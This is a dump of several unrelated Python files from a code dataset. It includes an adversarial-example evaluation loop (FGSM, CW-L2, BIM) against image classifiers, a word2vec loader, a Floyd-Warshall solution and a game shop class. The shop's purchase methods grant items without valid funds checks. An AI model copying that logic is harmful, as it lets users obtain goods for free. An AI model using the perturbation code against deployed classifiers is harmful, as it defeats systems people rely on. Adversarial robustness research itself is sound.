loss.backward()\n\n # Collect datagrad\n data_grad = data.grad.data\n\n # Call FGSM Attack\n if attack_method == 'cw_l2_attack':\n perturbed_data = cw_l2_attack(device, model, data, target, targeted=False, c=0.3)\n elif attack_method == 'fgsm':\n perturbed_data = fgsm_attack(data, epsilon, data_grad )\n elif attack_method =='bim':\n perturbed_data = basic_iterative_attack(model, loss, data, target, scale=1, eps=4, alpha=epsilon)\n\n\n # Re-classify the perturbed image\n output = model(perturbed_data)\n\n # Check for success\n final_pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n if final_pred.item() == target.item():\n correct += 1\n # Special case for saving 0 epsilon examples\n if (epsilon == 0) and (len(adv_examples) < 5):\n adv_ex = perturbed_data.squeeze().detach().cpu().numpy()\n adv_examples.append( (init_pred.item(), final_pred.item(), adv_ex) )\n else:\n # Save some adv examples for visualization later\n if len(adv_examples) < 5:\n adv_ex = perturbed_data.squeeze().detach().cpu().numpy()\n adv_examples.append( (init_pred.item(), final_pred.item(), adv_ex) )\n\n # Calculate final accuracy for this epsilon\n final_acc = correct/float(len(test_loader))\n print(\"Epsilon: {}\\tTest Accuracy = {} / {} = {}\".format(epsilon, correct, len(test_loader), final_acc))\n\n # Return the accuracy and an adversarial example\n return final_acc, adv_examples\n","sub_path":"free_lunch/attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":14721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"389008844","text":"import sqlite3\nimport logging\nimport time\nimport datetime\n\nWORD2VEC_TEXT = \"data/word2vec/jawiki_kv.txt\"\nDB_PATH = \"data/word2vec/kv.db\"\n\ndef return_column_names(n):\n if n >= 0:\n r = \"keyword TEXT PRIMARY KEY,\"\n for i in range(n):\n r += f\" vec{i} integer,\"\n else:\n r = \"?,\"\n for i in range(-1*n):\n r += \"?,\"\n return r[0:-1]\n\nif __name__==\"__main__\":\n\n start = time.time()\n\n fmt = \"%(asctime)s %(levelname)s %(name)s :%(message)s\"\n logging.basicConfig(level=logging.INFO, format=fmt)\n\n con = sqlite3.connect(DB_PATH)\n c = con.cursor()\n\n with open(WORD2VEC_TEXT, \"r\") as f:\n fl = f.readline()\n logging.info(\"Start: \" + fl)\n count = int(fl.split(\" \")[0])\n size = int(fl.split(\" \")[1])\n c.execute(f\"create table kv( {return_column_names(size)} );\")\n for i in range(2, count+2):\n line = f.readline()\n row = line.split(\" \")\n if len(row) != 201:\n logging.warn(f\"Index error: line: {i} text: {line}\")\n continue\n c.execute(f\"insert into kv values ({return_column_names(-1*size)});\", row)\n if i % 10**4 == 0:\n logging.info(f\"{i} / {count} done. {i/count*100} percent.\")\n con.commit()\n logging.info(\"DONE!!!\")\n con.commit()\n con.close()\n","sub_path":"vec2db.py","file_name":"vec2db.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"336812788","text":"__author__ = 'danil.gizdatullin'\n\nimport matplotlib.pyplot as plt\n\nimport config as conf\n\nf = open(conf.path_to_store_median_similarities, \"r\")\nsimilarities = []\nfor line in f:\n value = float(line[0: -1])\n similarities.append(value)\n\nprint(len(similarities))\n\nplt.hist(similarities, bins=100)\nplt.title(\"Similarities median\")\nplt.xlabel(\"Value\")\nplt.ylabel(\"Frequency\")\nplt.show()\n","sub_path":"Statistics/hist_for_median_similarity.py","file_name":"hist_for_median_similarity.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"580031255","text":"INF = float('inf')\n\n#METHOD 1:\ndef floyd_warshall():\n for k in range(49):\n for i in range(49):\n for j in range(49):\n if dist[i][k] + dist[k][j] > dist[i][j]:\n dist[i][j] = dist[i][k] + dist[k][j]\n \n \nnum_tests = int(input())\nfor t in range(num_tests):\n num_orders = int(input())\n dist = [[0 if i <= j else -INF for j in range(49)] for i in range(49)]\n \n last_time = 0\n for o in range(num_orders):\n s, e, c = map(int, input().split())\n dist[s][e] = max(c, dist[s][e])\n \n\n floyd_warshall()\n print (dist[0][48])\n\n\n\n# #METHOD 2:\n# def dynamic_programming():\n# best_comp_so_far = [0] * (last_time + 1)\n \n# for j in range(1, last_time + 1):\n# for i in range(j):\n# temp_comp = best_comp_so_far[i] + dist[i][j]\n# if temp_comp > best_comp_so_far[j]:\n# best_comp_so_far[j] = temp_comp\n# return best_comp_so_far[last_time] \n\n\n# num_tests = int(input())\n# for t in range(num_tests):\n# num_orders = int(input())\n \n# dist = [[0 for i in range(49)] for j in range(49)]\n# last_time = 0\n# for o in range(num_orders):\n# s, e, c = map(int, input().split())\n# dist[s][e] = max(dist[s][e], c)\n# if e > last_time:\n# last_time = e\n# result = dynamic_programming()\n# print(result)\n# ","sub_path":"codechef/event_organizer.py","file_name":"event_organizer.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"589563280","text":"from logger import fin_logger\r\n\r\nclass DB:\r\n\tdef __init__(self):\r\n\t\tself.tanks = {1101: {'credits': 500, 'gold': 0}, #tankID : {params}\r\n\t\t\t\t\t\t\t2101: {'credits': 850, 'gold': 10},\r\n\t\t\t\t\t\t\t3101: {'credits': 1500, 'gold': 50}}\r\n\r\n\t\tself.guns = {1101: {223: {'credits': 20, 'gold': 0}, #tankID : {gunID: {params}}\r\n\t\t\t\t\t\t224: {'credits': 0, 'gold': 30}},\r\n\t\t\t\t\t2101: {555: {'credits': 250, 'gold': 0},\r\n\t\t\t\t\t\t655: {'credits': 240, 'gold': 0}},\r\n\t\t\t\t\t3101: {485: {'credits': 220, 'gold': 0},\r\n\t\t\t\t\t\t286: {'credits': 120, 'gold': 0}}}\r\n\r\nclass Shop:\r\n\tdef __init__(self):\r\n\t\tself.fin_logger = fin_logger()\r\n\t\tself.db = DB()\r\n\r\n\tdef __buyTank(self, player, tankID):\r\n\t\tif tankID in self.db.tanks:\r\n\t\t\tplayer.inventoryPlanes.append(tankID)\r\n\r\n\t\t\tif self.db.tanks[tankID]['credits'] >= player.resources.credits and \\\r\n\t\t\t\tself.db.tanks[tankID]['gold'] >= player.resources.gold:\r\n\r\n\t\t\t\tplayer.resources.credits -= self.db.tanks[tankID]['credits']\r\n\t\t\t\tplayer.resources.gold -= self.db.tanks[tankID]['gold']\r\n\t\t\tplayer.saveResources()\r\n\t\t\tself.fin_logger.log_state(player)\r\n\r\n\tdef __buyGuns(self, *args):\r\n\t\tplayer, tankID, gunID = args\r\n\r\n\t\tif tankID in player.inventoryPlanes and gunID in self.db.guns[tankID]:\r\n\t\t\tplayer.inventoryGuns[tankID].append(gunID)\r\n\t\t\tplayer.resources.credits -= self.db.guns[tankID][gunID]['credits']\r\n\t\t\tplayer.resources.gold -= self.db.guns[tankID][gunID]['gold']\r\n\t\t\tplayer.saveResources()\r\n\r\n\t\tself.fin_logger.log_state(player)","sub_path":"TankShop.py","file_name":"TankShop.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"341838682","text":"# -*- coding: UTF-8 -*-\n\n# # 选择排序\n# height = [155, 187, 172, 160, 163, 166, 173, 182, 165, 159]\n# # 外层循环代表轮次\n# l = len(height)\n# i = 0\n# while i < l - 1:\n# # 内层循环,选择最大的\n# # 以第一个人为基准,记录下标\n# j = 1\n# tmp = 0\n# while j < l - i:\n# if height[tmp] < height[j]:\n# # 记录最大值下标\n# tmp = j\n# j = j + 1\n# # # 把最高的放到最后\n# t = height[tmp]\n# height[tmp] = height[l - i - 1]\n# height[l - i - 1] = t\n# i += 1\n# # 交换\n# # height[tmp], height[len(height) - i - 1] = height[len(height) - i - 1], height[tmp]\n#\n# print(height)\n#\n# # 冒泡排序\n# height = [190, 187, 172, 160, 163, 166, 173, 182, 165, 159]\n#\n# # 外层循环:控制比较的轮数\n# i = 0\n# # 要不要-1?需要-1,因为最后一轮只剩一个数,不用比较\n# while i